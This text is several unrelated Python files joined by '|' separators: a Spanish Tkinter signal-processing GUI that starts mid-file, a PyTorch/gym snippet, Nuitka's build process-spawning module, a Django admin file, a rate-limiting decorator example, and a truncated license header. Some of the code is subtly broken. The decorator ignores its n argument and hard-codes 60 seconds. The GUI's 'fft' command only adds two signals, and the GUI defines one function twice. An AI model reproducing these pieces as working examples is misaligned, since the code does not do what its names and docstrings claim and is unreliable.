bd=10, background="#ff9aa2", height=0, command=verInicio,
font=("Arial", 15)).place(x=2, y=5)
Button(ventana, text="Grabar", command=grabarGUI, font=("Arial", 15)).place(x=100, y=15)
Label(ventana, textvariable=estadoGrabacion,
font=("Arial", 10)).place(x=200, y=20)
estadoGrabacion.set("Sin grabar")
Button(ventana, text="Escuchar entrada", command=tests, font=("Arial", 15)).place(x=100, y=75)
Button(ventana, text="Escuchar salida", command=tests, font=("Arial", 15)).place(x=100+200, y=75)
Button(ventana, text="Amplificación / Atenuación", cursor="hand2",
bd=8, background="#ffb3cc", height=1, command=amplificarAtenuar,
font=("Arial", 16)).place(x=xPosicion, y=espacio * 2 + yPosicion)
Entry(ventana,justify=CENTER, textvariable=multiplicador, width=4,
font=("Arial", 16)).place(x=385, y=248)
Label(ventana, text="Multiplicador",
font=("Arial", 10)).place(x=380, y=225)
Button(ventana, text="Reflejo en X y Y", cursor="hand2",
bd=8, background="#ffb3cc", height=1, command=reflejarEnXyY,
font=("Arial", 16)).place(x=xPosicion, y=espacio*3+yPosicion)
Button(ventana, text="Desplazamiento", cursor="hand2",
bd=8, background="#ffb3cc", height=1, command=desplazar,
font=("Arial", 16)).place(x=xPosicion, y=espacio*4+yPosicion)
Entry(ventana,justify=CENTER, textvariable=udsDesplazamiento, width=4,
font=("Arial", 16)).place(x=285, y=323+53)
Label(ventana, text="Unidades a desplazar",
font=("Arial", 10)).place(x=285+5, y=300+53)
Entry(ventana,justify=CENTER, textvariable=factorInterpolacionDiezmacion, width=4,
font=("Arial", 16)).place(x=405, y=448)
Label(ventana, text="Factor de diezmación/interpolación",
font=("Arial", 10)).place(x=400, y=425)
Button(ventana, text="Diezmación", cursor="hand2",
bd=8, background="#ffb3cc", height=1, command=diezmarAudio,
font=("Arial", 16)).place(x=xPosicion, y=espacio*5+yPosicion)
Button(ventana, text="Interpolación", cursor="hand2",
bd=8, background="#ffb3cc", height=1, command=interpolarAudio,
font=("Arial", 16)).place(x=xPosicion+145, y=espacio*5+yPosicion)
Button(ventana, text="FFT", cursor="hand2",
bd=8, background="#ffb3cc", height=1, command=fft,
font=("Arial", 16)).place(x=xPosicion, y=espacio*7+yPosicion)
Button(ventana, text="Pruebas", command=tests).place(x=xPosicion+15, y=espacio*8+yPosicion)
ventana.mainloop()
def tests():
print("test")
def emparejarPuntosEjeHConInicio(senal):
"""
Empareja los puntos del eje H para graficar con los respectivos de la señal dada
Parameters:
senal (SenalDiscreta): La señal resultante de alguna operación de preferencia
"""
global puntosEjeH
puntosEjeH = []
for i in range(senal.obtener_indice_inicio(), senal.obtener_longitud() + senal.obtener_indice_inicio()):
puntosEjeH.append(i)
def configurarPantalla(operacion, resx, resh, resg):
"""
Configura la pantalla dependiendo que operación se haga
Parameters:
operacion (str): El título de la operación realizada
resx (str): La secuencia de la señal x(n) con formato {...,#,#,..}
resh (str): La secuencia de la señal h(n) con formato {...,#,#,..}
resg (str): La secuencia de la señal g(n) con formato {...,#,#,..}
"""
# Uso una imagen como fondo, debido a que es la
# unica forma que encuentro para tapar la
# ventana anterior, por lo que al crear un
# nuevo escenario, siempre se tiene que poner esto
imagenFondo = PhotoImage(file="imgs/fondo.pgm")
Label(ventana, image=imagenFondo).place(x=0, y=0)
#Coloca el boton regresa al inicio
Button(ventana, text="↶", cursor="hand2",
bd=10, background="#ff9aa2", height=0, command=verInicio,
font=("Arial", 19)).place(x=5, y=5)
#Titulo de la operacion
Label(ventana, text=operacion,
font=("Arial", 45)).place(x=270, y=50)
Label(ventana, text=resx,
font=("Arial", 25)).place(x=50, y=150)
Label(ventana, text=resh,
font=("Arial", 25)).place(x=50, y=220)
Label(ventana, text=resg,
font=("Arial", 25)).place(x=50, y=290)
"""
Para las operaciones que solo tienen una secuencia de entrada
y una de salida
"""
def configurarPantallaDeUnSoloValor(operacion, xn, gn):
"""
Configura la pantalla dependiendo que operación se haga
Parameters:
operacion (str): El título de la operación realizada
resx (str): La secuencia de la señal x(n) con formato {...,#,#,..}
resh (str): La secuencia de la señal h(n) con formato {...,#,#,..}
resg (str): La secuencia de la señal g(n) con formato {...,#,#,..}
"""
# Uso una imagen como fondo, debido a que es la
# unica forma que encuentro para tapar la
# ventana anterior, por lo que al crear un
# nuevo escenario, siempre se tiene que poner esto
imagenFondo = PhotoImage(file="imgs/fondo.pgm")
Label(ventana, image=imagenFondo).place(x=0, y=0)
#Coloca el boton regresa al inicio
Button(ventana, text="↶", cursor="hand2",
bd=10, background="#ff9aa2", height=0, command=verInicio,
font=("Arial", 19)).place(x=5, y=5)
#Se imprimen los arreglos emparejados
#y el resultado
resx = "x(n){"
for e in xn:
if e != "":
resx = resx + str(e) + ","
else:
resx = resx + str(e)
resx = resx + "}"
resg = "g(n){"
for e in gn:
if e != "":
resg = resg+str(e)+","
else:
resg = resg + str(e)
resg = resg+"}"
#Titulo de la operacion
Label(ventana, text=operacion,
font=("Arial", 45)).place(x=240, y=50)
Label(ventana, text=resx,
font=("Arial", 25)).place(x=50, y=150)
Label(ventana, text=resg,
font=("Arial", 25)).place(x=50, y=290)
def obtenerSecuencia(variable, senal):
"""
Obtiene la secuencia de una señal dada
Parameters:
variable (str): La letra de la variable de la señal
senal (SenialDiscreta): La señal discreta
Returns:
str: Secuencia de una señal en formato {...,#,...}
"""
secuencia = variable + "(n) = ["
for e in senal.obtener_datos():
if e != "":
secuencia = secuencia + str(e) + ","
else:
secuencia = secuencia + str(e)
secuencia = secuencia + "]"
return secuencia
def sumar():
"""
Comando asociado al botón "Sumar"
"""
# Obtiene datos de GUI
senales = emparejarValores()
xn = senales[0]
hn = senales[1]
# Desarrolla expansión para periocidad
if xn.es_periodica():
xn.expandir_periodo_izquierda(1)
xn.expandir_periodo_derecha(1)
hn.empatar(xn)
if hn.es_periodica():
hn.expandir_periodo_izquierda(1)
hn.expandir_periodo_derecha(1)
xn.empatar(hn)
emparejarPuntosEjeHConInicio(xn)
# Se realiza la operación
gn = obtenerSuma(xn, hn) # ------------------LINEA A CAMBIAR
gn.empatar(xn)
gn.empatar(hn)
operacion = "Suma" # ------------------------LINEA A CAMBIAR
# Se configura la GUI
configurarPantalla(operacion, obtenerSecuencia("x", xn), obtenerSecuencia("h", hn), obtenerSecuencia("g", gn))
# Grafica
graficar(puntosEjeH, xn.obtener_datos(), hn.obtener_datos(), gn.obtener_datos(), operacion)
ventana.mainloop()
def restar():
"""
Comando asociado al botón restar
"""
# Obtiene datos de GUI
senales = emparejarValores()
xn = senales[0]
hn = senales[1]
# Desarrolla expansión para periocidad
if xn.es_periodica():
xn.expandir_periodo_izquierda(1)
xn.expandir_periodo_derecha(1)
hn.empatar(xn)
if hn.es_periodica():
hn.expandir_periodo_izquierda(1)
hn.expandir_periodo_derecha(1)
xn.empatar(hn)
emparejarPuntosEjeHConInicio(xn)
# Se realiza la operación
gn = obtenerResta(xn, hn) # ------------------LINEA A CAMBIAR
gn.empatar(xn)
gn.empatar(hn)
operacion = "Restar" # -----------------------LINEA A CAMBIAR
# Se configura la GUI
configurarPantalla(operacion, obtenerSecuencia("x", xn), obtenerSecuencia("h", hn), obtenerSecuencia("g", gn))
# Grafica
graficar(puntosEjeH, xn.obtener_datos(), hn.obtener_datos(), gn.obtener_datos(), operacion)
ventana.mainloop()
def amplificarAtenuar():
global newX
concatenarSecuenciaX()
# Se realiza la operación
gn = obtenerAmplificacionAtenuacion(newX, float(multiplicador.get())) # ------------------LINEA A CAMBIAR
if float(multiplicador.get())>1:
operacion = "Amplificacion"
else:
operacion = "Atenuacion" # ------------------------LINEA A CAMBIAR
# Se configura la GUI
configurarPantallaDeUnSoloValor(operacion, newX, gn)
# Grafica
graficarSolo2(puntosEjeH, newX, gn, operacion)
ventana.mainloop()
"""
Hice otra función para reflejar al mismo tiempo en X e Y, .
"""
def reflejarEnXyY():
"""
Comando asociado al botón "reflejar"
"""
# Obtiene datos de GUI
senal = concatenarSecuenciaX()
xn = senal[0]
# Se realiza la operación
gnY = obtener_reflejoY(xn)
gnY = obtener_reflejoY(xn)
#gnY = obtener_reflejoY(xn)
datosAux = xn.obtener_datos()
for i in range(len(datosAux)):
datosAux[i] = datosAux[i] * -1
gnX = SenalDiscreta(datosAux, xn.obtener_indice_inicio(), xn.es_periodica())
operacion = "Reflejar" # ------------------------LINEA A CAMBIAR
# Se configura la GUI
configurarPantalla(operacion, obtenerSecuencia("x", xn), obtenerSecuencia("x", gnX), obtenerSecuencia("x", gnY))
# Grafica
graficarReflejo(puntosEjeH, gnX.obtener_datos(), gnY.obtener_datos(), operacion)
ventana.mainloop()
def desplazar():
"""
Comando asociado al botón "Desplazar"
"""
# Obtiene datos de GUI
senales = concatenarSecuenciaX()
xn = senales[0]
td = udsDesplazamiento.get()
# Se realiza la operación
gn1 = obtener_Desplazamiento(xn, 1, td) # Desplazamiento a la derecha
gn2 = obtener_Desplazamiento(xn, 2, td) # Desplazamiento a la izquierda
# Emparejando
xn.empatar(gn1)
emparejarPuntosEjeHConInicio(xn)
print("xn:", xn)
print("gn1:", gn1)
print("gn2:", gn2)
print("pts:", puntosEjeH)
operacion = "Desplazamiento" # ------------------------LINEA A CAMBIAR
# Se configura la GUI
configurarPantalla(operacion, obtenerSecuencia("x", xn), obtenerSecuencia("gn1", gn1), obtenerSecuencia("gn2", gn2))
# Grafica
graficar(puntosEjeH, xn.obtener_datos(), gn1.obtener_datos(), gn2.obtener_datos(), operacion)
ventana.mainloop()
def diezmar():
"""
Comando asociado al botón "Diezmación"
"""
# Obtiene datos de GUI
senales = concatenarSecuenciaX()
xn = senales[0]
operacion = "Diezmación"
if(xn.obtener_indice_inicio() > 0):
xn.asignar_indice_inicio(-xn.obtener_indice_inicio())
# Se realiza la operación
gn = obtenerDiezmacion(xn, int(factorInterpolacionDiezmacion.get()))
# Se configura la GUI
configurarPantallaDeUnSoloValor(operacion, xn.obtener_datos(), gn.obtener_datos())
# Grafica
gn.empatar(xn)
graficarSolo2(range(gn.obtener_longitud()), xn.obtener_datos(), gn.obtener_datos(), operacion)
ventana.mainloop()
def interpolar():
"""
Comando asociado al botón "Interpolar"
"""
#Obtiene datos de la GUI
seniales = concatenarSecuenciaX()
xn = seniales[0]
operacion = "Interpolación"
if(xn.obtener_indice_inicio() > 0):
xn.asignar_indice_inicio(-xn.obtener_indice_inicio())
# Se realiza la operación
gn = obtenerInterpolacion(xn, int(factorInterpolacionDiezmacion.get()))
# Se configura la GUI
configurarPantallaDeUnSoloValor(operacion, xn.obtener_datos(), gn.obtener_datos())
# Grafica
gn.empatar(xn)
graficarSolo2(range(gn.obtener_longitud()), xn.obtener_datos(), gn.obtener_datos(), operacion)
ventana.mainloop()
def diezmarAudio():
"""
Comando asociado al botón "Diezmar" cuando la GUI está configurada para procesar audio
"""
xn = SenalDiscreta(senal.obtener_datos().copy().tolist(), 0, False)
operacion = "Diezmación"
factor = int(factorInterpolacionDiezmacion.get())
# Se realiza la operación
gn = obtenerDiezmacion(xn, factor)
# Grafica
gn.asignar_indice_inicio(0)
gn.empatar(xn)
graficarInterpolacionDiezmacion(xn.obtener_datos(), gn.obtener_datos(), operacion, factor)
ventana.mainloop()
obtenerAudioDesdeSenalDiscreta(gn)
def interpolarAudio():
"""
Comando asociado al botón "Interpolar" cuando la GUI está configurada para procesar audio
"""
xn = SenalDiscreta(senal.obtener_datos().copy().tolist(), 0, False)
operacion = "Interpolación"
factor = int(factorInterpolacionDiezmacion.get())
# Se realiza la operación
gn = obtenerInterpolacion(xn, factor)
# Grafica
gn.empatar(xn)
graficarInterpolacionDiezmacion(xn.obtener_datos(), gn.obtener_datos(), operacion, factor)
ventana.mainloop()
obtenerAudioDesdeSenalDiscreta(gn)
# La falta de ortografia es adrede, porque ya existe la función sin falta de ortografia jaja
def convolusionar():
"""
Comando asociado al botón "Convolución"
"""
# Obtiene datos de GUI
senales = emparejarValores()
xn = senales[0]
hn = senales[1]
# Se realiza la operación
gn = convolucionar(xn, hn) # ------------------LINEA A CAMBIAR
# Se realiza emparejamiento
xn.empatar(gn)
hn.empatar(gn)
emparejarPuntosEjeHConInicio(gn)
operacion = "Convolución" # ------------------------LINEA A CAMBIAR
# Se configura la GUI
configurarPantalla(operacion, obtenerSecuencia("x", xn), obtenerSecuencia("h", hn), obtenerSecuencia("g", gn))
# Grafica
graficar(puntosEjeH, xn.obtener_datos(), hn.obtener_datos(), gn.obtener_datos(), operacion)
ventana.mainloop()
def fft():
"""
Comando asociado al botón "FFT"
"""
# Obtiene datos de GUI
senales = emparejarValores()
xn = senales[0]
hn = senales[1]
# Se realiza la operación
gn = obtenerSuma(xn, hn) # ------------------LINEA A CAMBIAR
operacion = "Suma" # ------------------------LINEA A CAMBIAR
# Se configura la GUI
configurarPantalla(operacion, obtenerSecuencia("x", xn), obtenerSecuencia("h", hn), obtenerSecuencia("g", gn))
# Grafica
graficar(puntosEjeH, xn.obtener_datos(), hn.obtener_datos(), gn.obtener_datos(), operacion)
ventana.mainloop()
# TODO: Validar valores de las entradas
# TODO: Cambiar lógica para señales periodicas y no periodicas
def emparejarValores():
'''Hace las listas correspondientes a x(n) y h(n) del mismo tamaño y las asigna newX y newH así como prepara los puntos en el eje horizontal de las gráficas para su posterior ploteo
Returns:
SenialDiscreta:Devuelve una tupla con objetos de SenialDiscreta que representan a x(n) (posición: 0) y h(n) (posición: 1)
'''
global puntosEjeH,newX,newH
#la funcion split sirve para separar
#la cadena cada vez que hay un
#determinado caracter, aqui en es las ","
hLAux = hL.get().split(",")
xLAux = xL.get().split(",")
hRAux = hR.get().split(",")
xRAux = xR.get().split(",")
# Se resetea newX, newH y puntosEjeH
newH = []
puntosEjeH = []
if len(xLAux)>len(hLAux):
for i in range(len(xLAux)-len(hLAux)):
newH.append(float(0))
for elemento in hLAux:
if elemento != "":
newH.append(float(elemento))
else:
newH.append(float(0))
newH.append(float(hO.get()))
#Para guardar el origen se cuenta desde
#el, y de cuentan la cantidad de elementos
#a la izquierda etiquetandolos como se
#encontrarian en la grafica
for i in range(len(newH)):
puntosEjeH.append(i*(-1))
#el arreglo se invierte debido a que en el
#arreglo tenemos 0,-1,-2 por ejemplo, y se
#debe de invertir para que quede como en una
#grafica normal
puntosEjeH.reverse()
for elemento in hRAux:
if elemento != "":
newH.append(float(elemento))
else:
newH.append(float(0))
for i in range(len(xRAux) - len(hRAux)):
newH.append(float(0))
for i in range(len(newH)-len(puntosEjeH)):
puntosEjeH.append(i+1)
# Se convierten listas para x
xls = []
xrs = []
for i in xLAux:
if i != '':
xls.append(float(i))
for i in xRAux:
if i != '':
xrs.append(float(i))
# Se convierte listas para h
hls = []
hrs = []
for i in hLAux:
if i != '':
hls.append(float(i))
for i in hRAux:
if i != '':
hrs.append(float(i))
# Obteniendo datos para x
indice_x = 0
if len(xLAux) > 0:
if xLAux[0] != '':
indice_x = -len(xLAux)
indice_h = 0
if len(xRAux) > 0:
if xRAux[0] != '':
indice_h = -len(hLAux)
print(xls)
print(xrs)
xn = SenalDiscreta(xls + [float(xO.get())] + xrs, indice_x, xesperiodica.get())
hn = SenalDiscreta(hls + [float(hO.get())] + hrs, indice_h, hesperiodica.get())
xn.empatar(hn)
return [xn, hn]
"""
Para las operaciones que solo requieran una secuencia de
entrada, entonces se utiliza esta funcion, ya que esta
no necesita ser acompletada con 0´s
"""
def concatenarSecuenciaX():
'''Hace las listas correspondientes a x(n) y h(n) del mismo tamaño y las asigna newX y newH así como prepara los puntos en el eje horizontal de las gráficas para su posterior ploteo
Returns:
SenialDiscreta:Devuelve una tupla con objetos de SenialDiscreta que representan a x(n) (posición: 0) y h(n) (posición: 1)
'''
global puntosEjeH,newX
#la funcion split sirve para separar
#la cadena cada vez que hay un
#determinado caracter, aqui en es las ","
xLAux = xL.get().split(",")
xRAux = xR.get().split(",")
# Se resetea newX, newH y puntosEjeH
newX = []
puntosEjeH = []
for elemento in xLAux:
if elemento != "":
newX.append(float(elemento))
else:
newX.append(float(0))
newX.append(float(xO.get()))
#Para guardar el origen se cuenta desde
#el, y se cuentan la cantidad de elementos
#a la izquierda etiquetandolos como se
#encontrarian en la grafica
for i in range(len(newX)):
puntosEjeH.append(i*(-1))
#el arreglo se invierte debido a que en el
#arreglo tenemos 0,-1,-2 por ejemplo, y se
#debe de invertir para que quede como en una
#grafica normal
puntosEjeH.reverse()
for elemento in xRAux:
if elemento != "":
newX.append(float(elemento))
else:
newX.append(float(0))
for i in range(len(newX)-len(puntosEjeH)):
puntosEjeH.append(i+1)
xn = SenalDiscreta(newX, -len(xLAux), xesperiodica.get())
return [xn]
def desplazar():
global newX,newX2,puntosEjeH
obtenerDesplazamiento()
# Se realiza la operación
operacion = "Desplazar"
# Se configura la GUI
configurarPantallaDeUnSoloValor(operacion, newX2,newX)
# Grafica
graficarSoloUna(puntosEjeH, newX, operacion)
ventana.mainloop()
def obtenerDesplazamiento():
global puntosEjeH,newX,newX2
#la funcion split sirve para separar
#la cadena cada vez que hay un
#determinado caracter, aqui en es las ","
xLAux = xL.get().split(",")
xRAux = xR.get().split(",")
newX2 = []
for elemento in xLAux:
if elemento != "":
newX2.append(float(elemento))
else:
newX2.append(float(0))
newX2.append(float(xO.get()))
for elemento in xRAux:
if elemento != "":
newX2.append(float(elemento))
else:
newX2.append(float(0))
if udsDesplazamiento.get()<0:
xLAux.reverse()
for i in range(udsDesplazamiento.get()):
xLAux.append(float(0))
xLAux.reverse()
else:
for i in range(udsDesplazamiento.get()):
xRAux.append(float(0))
# Se resetea newX, newH y puntosEjeH
newX = []
puntosEjeH = []
#int(udsDesplazamiento.get())
for elemento in xLAux:
if elemento != "":
newX.append(float(elemento))
else:
newX.append(float(0))
newX.append(float(xO.get()))
#Para guardar el origen se cuenta desde
#el, y se cuentan la cantidad de elementos
#a la izquierda etiquetandolos como se
#encontrarian en la grafica
for i in range(len(newX)+udsDesplazamiento.get()):
puntosEjeH.append(i*(-1))
#el arreglo se invierte debido a que en el
#arreglo tenemos 0,-1,-2 por ejemplo, y se
#debe de invertir para que quede como en una
#grafica normal
puntosEjeH.reverse()
for elemento in xRAux:
if elemento != "":
newX.append(float(elemento))
else:
newX.append(float(0))
if udsDesplazamiento.get()<0:
newX.reverse()
for i in range((udsDesplazamiento.get()*(-1))-2):
newX.append(float(0))
newX.reverse()
for i in range(len(newX)-len(puntosEjeH)):
puntosEjeH.append(i+1)
def graficarSoloUna(puntosEjeH,resultado,operacion):
plt.suptitle(operacion+' x(n)')
markerline, stemlines, baseline = plt.stem(puntosEjeH, resultado, '-.')
pyplot.axhline(0, color="black")
pyplot.axvline(0, color="black")
plt.ylabel('x(n)')
plt.show()
def graficar(puntosEjeH,newX,newH, resultado,operacion):
#puntosEjeH se refiere al eje vertical
#Los 4 arreglos deben de tener la misma cantida
#de elementos
#x(n) en la primera posicion
plt.subplot(311)
markerline, stemlines, baseline = plt.stem(puntosEjeH, newX, '-.')
pyplot.axhline(0, color="black")
pyplot.axvline(0, color="black")
plt.ylabel('x(n)')
#h(n) en la segunda posicion
plt.subplot(312)
markerline, stemlines, baseline = plt.stem(puntosEjeH, newH, '-.')
pyplot.axhline(0, color="black")
pyplot.axvline(0, color="black")
plt.ylabel('h(n)')
#g(n) en la tercer posicion
plt.subplot(313)
markerline, stemlines, baseline = plt.stem(puntosEjeH, resultado, '-.')
# setting property of baseline with color red and linewidth 2
plt.suptitle(operacion+' x(n) con h(n)')
plt.setp(baseline)
plt.ylabel('g(n)')
pyplot.axhline(0, color="black")
pyplot.axvline(0, color="black")
plt.show()
"""
Necesitaba una grafica personalizada para el reflejo,
probablemente se puede reutilizar codigo, pero por
cuestiones practicas no lo hice
"""
def graficarReflejo(puntosEjeH,ejeX,ejeY,operacion):
#puntosEjeH se refiere al eje vertical
#Los 4 arreglos deben de tener la misma cantida
#de elementos
#h(n) en la segunda posicion
plt.subplot(311)
markerline, stemlines, baseline = plt.stem(puntosEjeH, ejeX, '-.')
pyplot.axhline(0, color="black")
pyplot.axvline(0, color="black")
plt.ylabel('En X')
#g(n) en la tercer posicion
plt.subplot(313)
markerline, stemlines, baseline = plt.stem(puntosEjeH, ejeY, '-.')
# setting property of baseline with color red and linewidth 2
plt.suptitle(operacion+' x(n) en el eje X y Y')
plt.setp(baseline)
plt.ylabel('En Y')
pyplot.axhline(0, color="black")
pyplot.axvline(0, color="black")
plt.show()
#Aqui se grafican solo 2 graficas
def graficarSolo2(puntosEjeH,newX,resultado,operacion):
#puntosEjeH se refiere al eje vertical
#Los 4 arreglos deben de tener la misma cantida
#de elementos
#x(n) en la primera posicion
plt.subplot(311)
markerline, stemlines, baseline = plt.stem(puntosEjeH, newX, '-.')
pyplot.axhline(0, color="black")
pyplot.axvline(0, color="black")
plt.ylabel('x(n)')
#g(n) en la tercer posicion
plt.subplot(313)
markerline, stemlines, baseline = plt.stem(puntosEjeH, resultado, '-.')
# setting property of baseline with color red and linewidth 2
plt.suptitle(operacion+' x(n) con algo')
plt.setp(baseline)
plt.ylabel('g(n)')
pyplot.axhline(0, color="black")
pyplot.axvline(0, color="black")
plt.show()
def grabarGUI():
"""
Graba el audio en la GUI
"""
estadoGrabacion.set("Grabando...")
global senal
senal = obtenerSenalDiscretaDesdeAudio()
estadoGrabacion.set("Audio grabado")
crearVentana()
verInicio()
|
'''
Source codes for Python Machine Learning By Example 3rd Edition (Packt Publishing)
Chapter 14 Making Decision in Complex Environments with Reinforcement Learning
Author: Yuxi (Hayden) Liu (yuxi.liu.ece@gmail.com)
'''
import torch
x = torch.empty(3, 4)
print(x)
from gym import envs
print(envs.registry.all())
|
# Copyright 2021, Kay Hayen, mailto:kay.hayen@gmail.com
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Spawning processes.
This is to replace the standard spawn implementation with one that tracks the
progress, and gives warnings about things taking very long.
"""
import os
import sys
import threading
from nuitka.Tracing import my_print, scons_logger
from nuitka.utils.Execution import executeProcess
from nuitka.utils.Timing import TimerReport
from .SconsCaching import runClCache
from .SconsProgress import closeSconsProgressBar, updateSconsProgressBar
from .SconsUtils import decodeData
# Thread class to run a command
class SubprocessThread(threading.Thread):
def __init__(self, cmdline, env):
threading.Thread.__init__(self)
self.cmdline = cmdline
self.env = env
self.data = None
self.err = None
self.exit_code = None
self.exception = None
self.timer_report = TimerReport(
message="Running %s took %%.2f seconds"
% repr(self.cmdline).replace("%", "%%"),
min_report_time=60,
logger=scons_logger,
)
def run(self):
try:
# execute the command, queue the result
with self.timer_report:
self.data, self.err, self.exit_code = executeProcess(
command=self.cmdline, env=self.env
)
except Exception as e: # will rethrow all, pylint: disable=broad-except
self.exception = e
def getProcessResult(self):
return self.data, self.err, self.exit_code, self.exception
def runProcessMonitored(cmdline, env):
thread = SubprocessThread(cmdline, env)
thread.start()
# Allow a minute before warning for long compile time.
thread.join(60)
if thread.is_alive():
scons_logger.info(
"Slow C compilation detected, used %.0fs so far, this might indicate scalability problems."
% thread.timer_report.getTimer().getDelta()
)
thread.join()
updateSconsProgressBar()
return thread.getProcessResult()
def _filterMsvcLinkOutput(env, module_mode, data, exit_code):
# Training newline in some cases, esp. LTO it seems.
data = data.rstrip()
if module_mode:
data = b"\r\n".join(
line
for line in data.split(b"\r\n")
if b" Creating library" not in line
# On localized compilers, the message to ignore is not as clear.
if not (module_mode and b".exp" in line)
)
# The linker will say generating code at the end, due to localization
# we don't know.
if env.lto_mode and exit_code == 0:
if len(data.split(b"\r\n")) == 2:
data = b""
if env.pgo_mode == "use" and exit_code == 0:
# Very spammy, partially in native language for PGO link.
data = b""
return data
# To work around Windows not supporting command lines of greater than 10K by
# default:
def getWindowsSpawnFunction(env, module_mode, source_files):
def spawnWindowsCommand(
sh, escape, cmd, args, os_env
): # pylint: disable=unused-argument
# The "del" appears to not work reliably, but is used with large amounts of
# files to link. So, lets do this ourselves, plus it avoids a process
# spawn.
if cmd == "del":
assert len(args) == 2
os.unlink(args[1])
return 0
# For quoted arguments that end in a backslash, things don't work well
# this is a workaround for it.
def removeTrailingSlashQuote(arg):
if arg.endswith(r"\""):
return arg[:-1] + '\\"'
else:
return arg
newargs = " ".join(removeTrailingSlashQuote(arg) for arg in args[1:])
cmdline = cmd + " " + newargs
# Special hook for clcache inline copy
if cmd == "<clcache>":
data, err, rv = runClCache(args, os_env)
else:
data, err, rv, exception = runProcessMonitored(cmdline, os_env)
if exception:
closeSconsProgressBar()
raise exception
if cmd == "link":
data = _filterMsvcLinkOutput(
env=env, module_mode=module_mode, data=data, exit_code=rv
)
elif cmd in ("cl", "<clcache>"):
# Skip forced output from cl.exe
data = data[data.find(b"\r\n") + 2 :]
source_basenames = [
os.path.basename(source_file) for source_file in source_files
]
def check(line):
return line in (b"", b"Generating Code...") or line in source_basenames
data = (
b"\r\n".join(line for line in data.split(b"\r\n") if not check(line))
+ b"\r\n"
)
if data is not None and data.rstrip():
my_print("Unexpected output from this command:", style="yellow")
my_print(cmdline, style="yellow")
if str is not bytes:
data = decodeData(data)
my_print(data, style="yellow", end="")
if err:
if str is not bytes:
err = decodeData(err)
my_print(err, style="yellow", end="")
return rv
return spawnWindowsCommand
def _unescape(arg):
# Undo the damage that scons did to pass it to "sh"
arg = arg.strip('"')
slash = "\\"
special = '"$()'
arg = arg.replace(slash + slash, slash)
for c in special:
arg = arg.replace(slash + c, c)
return arg
def isIgnoredError(line):
# Many cases, pylint: disable=too-many-return-statements
# Debian Python2 static libpython lto warnings:
if b"function `posix_tmpnam':" in line:
return True
if b"function `posix_tempnam':" in line:
return True
# Self compiled Python2 static libpython lot warnings:
if b"the use of `tmpnam_r' is dangerous" in line:
return True
if b"the use of `tempnam' is dangerous" in line:
return True
if line.startswith((b"Objects/structseq.c:", b"Python/import.c:")):
return True
if line == b"In function 'load_next',":
return True
if b"at Python/import.c" in line:
return True
# Bullseys when compiling in directory with spaces:
if b"overriding recipe for target" in line:
return True
if b"ignoring old recipe for target" in line:
return True
if b"Error 1 (ignored)" in line:
return True
# Trusty has buggy toolchain that does this with LTO.
if (
line
== b"""\
bytearrayobject.o (symbol from plugin): warning: memset used with constant zero \
length parameter; this could be due to transposed parameters"""
):
return True
# The gcc LTO with debug information is deeply buggy with many messages:
if b"Dwarf Error:" in line:
return True
return False
def subprocess_spawn(args):
sh, _cmd, args, env = args
_stdout, stderr, exit_code = executeProcess(
command=[sh, "-c", " ".join(args)], env=env
)
ignore_next = False
for line in stderr.splitlines():
if ignore_next:
ignore_next = False
continue
if isIgnoredError(line):
ignore_next = True
continue
if str is not bytes:
line = decodeData(line)
my_print(line, style="yellow", file=sys.stderr)
return exit_code
class SpawnThread(threading.Thread):
def __init__(self, *args):
threading.Thread.__init__(self)
self.args = args
self.timer_report = TimerReport(
message="Running %s took %%.2f seconds"
% (" ".join(_unescape(arg) for arg in self.args[2]).replace("%", "%%"),),
min_report_time=60,
logger=scons_logger,
)
self.result = None
self.exception = None
def run(self):
try:
# execute the command, queue the result
with self.timer_report:
self.result = subprocess_spawn(self.args)
except Exception as e: # will rethrow all, pylint: disable=broad-except
self.exception = e
def getSpawnResult(self):
return self.result, self.exception
def runSpawnMonitored(sh, cmd, args, env):
thread = SpawnThread(sh, cmd, args, env)
thread.start()
# Allow a minute before warning for long compile time.
thread.join(60)
if thread.is_alive():
scons_logger.info(
"Slow C compilation detected, used %.0fs so far, this might indicate scalability problems."
% thread.timer_report.getTimer().getDelta()
)
thread.join()
updateSconsProgressBar()
return thread.getSpawnResult()
def getWrappedSpawnFunction():
def spawnCommand(sh, escape, cmd, args, env):
# signature needed towards Scons core, pylint: disable=unused-argument
# Avoid using ccache on binary constants blob, not useful and not working
# with old ccache.
if '"__constants_data.o"' in args or '"__constants_data.os"' in args:
env = dict(env)
env["CCACHE_DISABLE"] = "1"
result, exception = runSpawnMonitored(sh, cmd, args, env)
if exception:
closeSconsProgressBar()
raise exception
return result
return spawnCommand
def enableSpawnMonitoring(env, win_target, module_mode, source_files):
if win_target:
env["SPAWN"] = getWindowsSpawnFunction(
env=env, module_mode=module_mode, source_files=source_files
)
else:
env["SPAWN"] = getWrappedSpawnFunction()
|
from django.contrib import admin
from .models import Post, Group
class PostAdmin(admin.ModelAdmin):
list_display = (
'pk',
'text',
'pub_date',
'author',
'group',
)
list_editable = ('group',)
search_fields = ('text',)
list_filter = ('pub_date',)
empty_value_display = '-пусто-'
admin.site.register(Post, PostAdmin)
admin.site.register(Group)
|
#!/usr/bin/env python3
"""Example of a decorator that ensures a function cannot be run
more than once every n seconds, where n is passed to the decorator
as an argument.
From Reuven Lerner's "Practical Decorators" talk at PyCon 2019.
Reuven's courses, books, and newsletter are at https://lerner.co.il/
"""
import time
class CalledTooOftenError(Exception):
pass
def once_per_n(n):
def middle(func):
last_invoked = 0
def wrapper(*args, **kwargs):
nonlocal last_invoked
elapsed_time = time.time() - last_invoked
if elapsed_time < 60:
raise CalledTooOftenError(f"Only {elapsed_time} has passed")
last_invoked = time.time()
return func(*args, **kwargs)
return wrapper
return middle
if __name__ == "__main__":
@once_per_n(5)
def slow_add(a, b):
time.sleep(3)
return a + b
print(slow_add(2, 2))
print(slow_add(3, 3))
print(slow_add(4, 4))
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright 2016 Eddie Antonio Santos <easantos@ualberta.ca>
#
# Licensed under the Apache License, Version 2.0 (the "License");
